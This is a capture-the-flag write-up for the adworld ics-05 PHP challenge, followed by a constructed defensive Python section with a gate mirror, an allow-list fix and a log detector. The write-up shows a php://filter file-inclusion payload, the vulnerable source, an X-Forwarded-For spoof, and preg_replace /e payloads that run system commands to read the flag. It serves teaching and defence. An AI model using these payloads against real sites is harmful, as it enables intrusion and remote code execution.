Problem source: 攻防世界 (adworld) Web 高手进阶区 (advanced web area), ics-05 (XCTF 4th-CyberEarth)

1. Opening the challenge, we find an index.php page, and the text "设备…" (device list) is cut off and not fully displayed, which makes that spot suspicious.

2. In the page source we find ?page=index. A GET parameter named page suggests there may be a file-inclusion vulnerability that lets us read source code, so we try to read the source of index.php. The code is read directly through one of PHP's built-in stream wrappers:

/index.php?page=php://filter/read=convert.base64-encode/resource=index.php

Black-box heuristic for LFI: judging from the URL alone, when the URL carries parameters with names such as path, dir, file, pag, page, archive, p, eng or language-file parameters, a file-inclusion vulnerability may exist. Because the page source hints at ?page=index, we read the source of index.php.

3. Base64-decode the result:

```php
<?php
error_reporting(0);
session_start();
posix_setuid(1000);
?>
<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  <meta name="renderer" content="webkit">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <link rel="stylesheet" href="layui/css/layui.css" media="all">
  <title>设备维护中心</title>
  <meta charset="utf-8">
</head>
<body>
<ul class="layui-nav">
  <li class="layui-nav-item layui-this"><a href="?page=index">云平台设备维护中心</a></li>
</ul>
<fieldset class="layui-elem-field layui-field-title" style="margin-top: 30px;">
  <legend>设备列表</legend>
</fieldset>
<table class="layui-hide" id="test"></table>
<script type="text/html" id="switchTpl">
  <!-- the checked state here is only a demo -->
  <input type="checkbox" name="sex" value="{{d.id}}" lay-skin="switch" lay-text="开|关" lay-filter="checkDemo" {{ d.id==10003 ? 'checked' : '' }}>
</script>
<script src="layui/layui.js" charset="utf-8"></script>
<script>
layui.use('table', function() {
  var table = layui.table, form = layui.form;
  table.render({
    elem: '#test',
    url: '/somrthing.json',
    cellMinWidth: 80,
    cols: [[
      {type: 'numbers'},
      {type: 'checkbox'},
      {field: 'id', title: 'ID', width: 100, unresize: true, sort: true},
      {field: 'name', title: '设备名', templet: '#nameTpl'},
      {field: 'area', title: '区域'},
      {field: 'status', title: '维护状态', minWidth: 120, sort: true},
      {field: 'check', title: '设备开关', width: 85, templet: '#switchTpl', unresize: true}
    ]],
    page: true
  });
});
</script>
<script>
layui.use('element', function() {
  var element = layui.element;
  // the nav hover effect and sub-menus depend on the element module
  // listen for nav clicks
  element.on('nav(demo)', function(elem) {
    // console.log(elem)
    layer.msg(elem.text());
  });
});
</script>
<?php
$page = $_GET['page'];
if (isset($page)) {
  if (ctype_alnum($page)) {
?>
    <br/><br/><br/><br/>
    <div style="text-align:center">
      <p class="lead"><?php echo $page; die(); ?></p>
    <br/><br/><br/><br/>
<?php
  } else {
?>
    <br/><br/><br/><br/>
    <div style="text-align:center">
      <p class="lead">
<?php
    if (strpos($page, 'input') > 0) { die(); }
    if (strpos($page, 'ta:text') > 0) { die(); }
    if (strpos($page, 'text') > 0) { die(); }
    if ($page === 'index.php') { die('Ok'); }
    include($page);
    die();
?>
      </p>
    <br/><br/><br/><br/>
<?php
  }
}
// convenient input/output helper; the feature is still under development and may only be tested by internal staff
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
  echo "<br >Welcome My Admin ! <br >";
  $pattern = $_GET['pat'];
  $replacement = $_GET['rep'];
  $subject = $_GET['sub'];
  if (isset($pattern) && isset($replacement) && isset($subject)) {
    preg_replace($pattern, $replacement, $subject);
  } else {
    die();
  }
}
?>
</body>
</html>
```

With the source in hand, start the audit:

```php
// convenient input/output helper; the feature is still under development and may only be tested by internal staff
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
  echo "<br >Welcome My Admin ! <br >";
  $pattern = $_GET['pat'];
  $replacement = $_GET['rep'];
  $subject = $_GET['sub'];
  if (isset($pattern) && isset($replacement) && isset($subject)) {
    preg_replace($pattern, $replacement, $subject);
  } else {
    die();
  }
}
```

The preg_replace function appears here, so we test whether a command-injection vulnerability exists. preg_replace searches subject for the parts that match pattern and replaces them with replacement. What this challenge clearly tests is code execution through preg_replace's /e modifier: when the pat value matches the sub value, the code in rep is executed.

After changing X-Forwarded-For to 127.0.0.1, the three GET parameters come in. preg_replace is called with pat unfiltered, so /e can be passed in to trigger the vulnerability; once triggered, the replacement statement is executed. First run phpinfo, which executes successfully. Then use system("ls") to try to list the directory. Use cd to enter the target directory:

system("cd s3chahahaDir/flag%26%26ls")

To avoid encoding problems, a space cannot be used as the separator here; %26%26 (&&) is used instead, meaning the command after it runs only when the command before it succeeds. Finally, use cat to read flag.php and obtain the flag.

Summary

Line of thought:
1. ?page=index suggests a file-inclusion vulnerability that can read source; use /index.php?page=php://filter/read=convert.base64-encode/resource=index.php to obtain the source of index.php.
2. Audit the source. preg_replace is present; use the command-execution vulnerability to list the directory and find the target file.
3. Read the file containing the flag and obtain the flag.

Key skills:
- File-inclusion vulnerabilities
- php://filter among PHP's stream wrappers (伪协议)
- Command execution caused by preg_replace
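As an added example, constructed here and not code from the writeup or from the ics-05 challenge, the following Python looks at the same two audit points from the defender's side. It transcribes the challenge's include() gate so that its blind spots are visible (the `strpos(...) > 0` comparison and the absence of any stream-wrapper check), puts an allow-list resolver beside it, and adds a small detector for the two indicators used above: a `php://filter` wrapper in `page`, and a PCRE pattern carrying the `e` modifier sent to `pat` together with a spoofable X-Forwarded-For. The allow-list contents, the log format and every log line are invented for the demo.

```python
"""Constructed defender-side checks for the ics-05 index.php audit.
Not the challenge's code; page names, paths and log lines are invented."""
import re
from urllib.parse import parse_qs, urlsplit

# Hypothetical allow-list: request value -> file the application may include.
PAGES = {"index": "index.php"}

WRAPPER_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.I)   # php://, data://, ...
_BRACKET_DELIMS = {"(": ")", "[": "]", "{": "}", "<": ">"}


def php_strpos(haystack, needle):
    """PHP strpos(): offset of the first match, or False when absent."""
    i = haystack.find(needle)
    return False if i < 0 else i


def page_gate_as_written(page):
    """Literal mirror of the challenge's gate; returns the branch taken.
    Two defects: `strpos(...) > 0` is false both when the needle is absent
    and when it sits at offset 0, and nothing rejects stream wrappers, so a
    php://filter/... value reaches include() untouched."""
    if re.fullmatch(r"[A-Za-z0-9]+", page):      # ctype_alnum()
        return "echo"                             # echoed, never included
    for needle in ("input", "ta:text", "text"):
        if php_strpos(page, needle) > 0:          # False > 0 and 0 > 0 are both False
            return "die"
    if page == "index.php":
        return "ok"
    return "include"


def hardened_resolve(page):
    """Allow-list resolver: only exact, known names map to a file; anything
    else is rejected, so wrappers and traversal never reach include()."""
    return PAGES.get(page)


def pattern_uses_eval_modifier(pat):
    """True when a PCRE pattern string carries the `e` modifier.
    PHP takes the first non-blank character as the delimiter (bracket
    delimiters pair with their closing bracket); what follows the closing
    delimiter is the modifier list. PHP >= 7.0 rejects `e`; PHP 5.x
    evaluates the replacement as PHP code."""
    pat = pat.lstrip()
    if not pat:
        return False
    close = _BRACKET_DELIMS.get(pat[0], pat[0])
    end = pat.rfind(close)
    if end <= 0:
        return False
    return "e" in pat[end + 1:]


# Constructed log shape: client "METHOD target HTTP/x" status xff=<header value>
LOG_RE = re.compile(
    r'^(?P<client>\S+) "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) xff=(?P<xff>\S+)$')


def scan_access_log(lines):
    """Return (line_no, indicator, detail) tuples for the two indicators."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        # parse_qs splits on '&' before percent-decoding, so an encoded
        # %26%26 stays inside a single parameter value.
        qs = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for page in qs.get("page", []):
            if WRAPPER_RE.match(page) or ".." in page:
                findings.append((n, "lfi-wrapper-or-traversal", page))
        for pat in qs.get("pat", []):
            if pattern_uses_eval_modifier(pat):
                findings.append((n, "preg_replace-e-modifier",
                                 f"pat={pat} xff={m['xff']}"))
    return findings


SAMPLE_LOG = [  # constructed lines, not captured traffic
    '203.0.113.7 "GET /index.php?page=index HTTP/1.1" 200 xff=-',
    '203.0.113.7 "GET /index.php?page=php://filter/read=convert.base64-encode'
    '/resource=index.php HTTP/1.1" 200 xff=-',
    '203.0.113.7 "GET /index.php?pat=/test/e&rep=phpinfo()&sub=test HTTP/1.1" 200 xff=127.0.0.1',
    '203.0.113.7 "GET /index.php?pat=/test/i&rep=x&sub=test HTTP/1.1" 200 xff=127.0.0.1',
]

if __name__ == "__main__":
    for value in ("index", "php://filter/read=convert.base64-encode/resource=index.php"):
        print(f"{value!r}: as written -> {page_gate_as_written(value)}, "
              f"hardened -> {hardened_resolve(value)}")
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

The allow-list resolver is the real fix for the include: the request value selects an entry in a fixed map and is never itself used as a path, so there is nothing for a wrapper or traversal string to reach. For the preg_replace sink, the durable fix is to never accept the pattern from the client at all; running on PHP 7 or later additionally removes the `e` modifier, but an attacker-supplied pattern remains a regex denial-of-service surface even then.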
http://www.hkea.cn/news/14465835/
